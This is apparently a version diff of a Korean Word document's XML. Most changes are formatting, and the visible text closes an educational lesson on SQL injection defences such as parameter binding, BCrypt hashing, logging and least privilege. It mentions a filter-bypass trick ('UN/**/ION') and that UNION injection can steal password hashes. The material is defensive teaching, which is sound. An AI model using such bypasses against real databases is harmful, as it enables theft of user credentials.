         <w:t>다만 이들은 공격 패턴을 걸러내는 보조 방어일 뿐, 인코딩·변형(예: UN/**/ION 처럼 쪼개기)으로 우회될 수 있어 근본 방어인 파라미터 바인딩(8-1)을 대체하지 못한다.</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="0"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>민감정보 암호화 저장</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 비밀번호는 BCrypt 등으로 해시 저장하여, 설령 탈취되어도 즉시 악용을 어렵게 한다. (현재 앱은 BCrypt 적용됨)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>최신 보안 패치</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — DB 엔진, JDBC 드라이버, 프레임워크를 최신으로 유지한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>로깅·모니터링</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 비정상 쿼리·대량 조회·반복 오류를 탐지해 공격 시도를 조기에 인지한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>이스케이프(Escaping)</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 특수문자를 수동으로 처리하는 방식. 누락·우회가 쉬워 최후 수단이며, 바인딩을 대체하지 못한다(권장하지 않음).</w:t>
       </w:r>
     </w:p>
@@ -4398,6 +5297,29 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:spacing w:before="240" w:after="120"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E5496"/>
+        </w:rPr>
+        <w:sectPr>
+          <w:headerReference w:type="even" r:id="rId13"/>
+          <w:headerReference w:type="default" r:id="rId14"/>
+          <w:footerReference w:type="even" r:id="rId15"/>
+          <w:footerReference w:type="default" r:id="rId16"/>
+          <w:headerReference w:type="first" r:id="rId17"/>
+          <w:footerReference w:type="first" r:id="rId18"/>
+          <w:pgSz w:w="11906" w:h="16838"/>
+          <w:pgMar w:top="1200" w:right="1200" w:bottom="1200" w:left="1200" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:pgNumType w:start="1"/>
+          <w:cols w:space="720"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4411,20 +5333,19 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="af"/>
         <w:tblW w:w="9000" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000"/>
         </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="1700"/>
@@ -4905,14 +5826,23 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve">SQL Injection의 본질은 </w:t>
       </w:r>
       <w:r>
@@ -4924,68 +5854,111 @@
         <w:t>입력을 데이터가 아닌 SQL 구문으로 취급</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>하는 것이다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve">취약/안전을 가르는 것은 도구가 아니라 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>문자열 결합 vs 파라미터 바인딩</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>이다. JPA도 결합하면 뚫린다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>UNION 인젝션으로 다른 테이블(user_info)의 계정·비밀번호 해시까지 탈취될 수 있다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>근본 방어는 파라미터 바인딩이며, 최소 권한·오류 숨김을 함께 적용한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>공격 실습은 반드시 격리된 교육용 환경에서만 수행한다.</w:t>
       </w:r>
     </w:p>
@@ -4993,19 +5966,153 @@
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1200" w:right="1200" w:bottom="1200" w:left="1200" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="720"/>
-      <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="af1"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="af1"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="af1"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="af0"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
+<file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:sdt>
+    <w:sdtPr>
+      <w:id w:val="-315886765"/>
+      <w:docPartObj>
+        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
+        <w:docPartUnique/>
+      </w:docPartObj>
+    </w:sdtPr>
+    <w:sdtEndPr/>
+    <w:sdtContent>
+      <w:p>
+        <w:pPr>
+          <w:pStyle w:val="af0"/>
+          <w:jc w:val="right"/>
+        </w:pPr>
+        <w:r>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:lang w:val="ko-KR"/>
+          </w:rPr>
+          <w:t>14</w:t>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:p>
+    </w:sdtContent>
+  </w:sdt>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="af0"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
+<file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="af0"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="32D42C6F"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="9438C268"/>
-    <w:lvl w:ilvl="0" w:tplc="BEB8317C">
+    <w:nsid w:val="4C0934BE"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="4C886B74"/>
+    <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -5014,7 +6121,7 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="C276A678" w:tentative="1">
+    <w:lvl w:ilvl="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="○"/>
@@ -5023,7 +6130,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="C3E0D98A" w:tentative="1">
+    <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="■"/>
@@ -5032,7 +6139,7 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="114E5530" w:tentative="1">
+    <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -5041,7 +6148,7 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="646E2D18" w:tentative="1">
+    <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="○"/>
@@ -5050,7 +6157,7 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="78DE5CEE" w:tentative="1">
+    <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="■"/>
@@ -5059,7 +6166,7 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="B3A41AFA" w:tentative="1">
+    <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -5068,7 +6175,7 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="5B16CDFE" w:tentative="1">
+    <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -5077,7 +6184,7 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="43EE8414" w:tentative="1">
+    <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -5089,9 +6196,6 @@
   </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="0"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
   </w:num>
 </w:numbering>
 </file>
@@ -5102,14 +6206,14 @@
     <w:rPrDefault>
       <w:rPr>
         <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
-        <w:lang w:val="en-US" w:eastAsia="ko-KR" w:bidi="ar-SA"/>
+        <w:lang w:val="en" w:eastAsia="ko-KR" w:bidi="ar-SA"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault/>
   </w:docDefaults>
   <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
